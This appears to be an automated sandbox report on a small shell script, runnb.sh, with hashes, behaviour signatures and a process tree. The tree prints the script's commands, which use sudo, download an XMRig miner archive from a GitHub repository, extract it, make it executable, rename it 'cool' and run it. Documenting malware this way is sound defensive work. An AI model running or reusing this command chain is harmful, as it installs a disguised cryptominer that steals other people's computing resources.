Overview

overview

10

Static

static

1

runnb.sh

ubuntu-22.04-amd64

10

runnb.sh

debian-12-armhf

10

runnb.sh

debian-12-mipsel

7

runnb.sh

debian-9-armhf

7

runnb.sh

debian-9-mips

7

runnb.sh

debian-9-mipsel

7

runnb.sh

ubuntu-20.04-amd64

10

runnb.sh

ubuntu-22.04-amd64

10

runnb.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    13s
  • max time network
    17s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    30-10-2024 07:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    runnb.sh

  • Size

    213B

  • MD5

    a1189543e2f98f6696c6d857b899ab0a

  • SHA1

    30b167128357a05cb5ae4d8bd386d63839d99c4d

  • SHA256

    a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

  • SHA512

    472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score
7/10
defense_evasiondiscoveryprivilege_escalation

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

    Abuse sudo or cached sudo credentials to execute code.

    privilege_escalationdefense_evasion
  • Reads runtime system information 8 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runnb.sh
    /tmp/runnb.sh
    1⤵
      PID:650
      • /usr/bin/sudo
        sudo apt install wget
        2⤵
        • Abuse Elevation Control Mechanism: Sudo and Sudo Caching
        • Reads runtime system information
        PID:658
      • /usr/bin/apt
        apt install wget
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:663
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:668
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:680
      • /usr/bin/wget
        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
        2⤵
          PID:697
        • /bin/tar
          tar xvf xmrigtar.tar.gz
          2⤵
          • Reads runtime system information
          PID:698
        • /bin/chmod
          chmod +x xmrig
          2⤵
          • File and Directory Permissions Modification
          PID:699
        • /bin/mv
          mv xmrig cool
          2⤵
          • Reads runtime system information
          PID:700
        • /tmp/cool
          ./cool
          2⤵
            PID:701

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads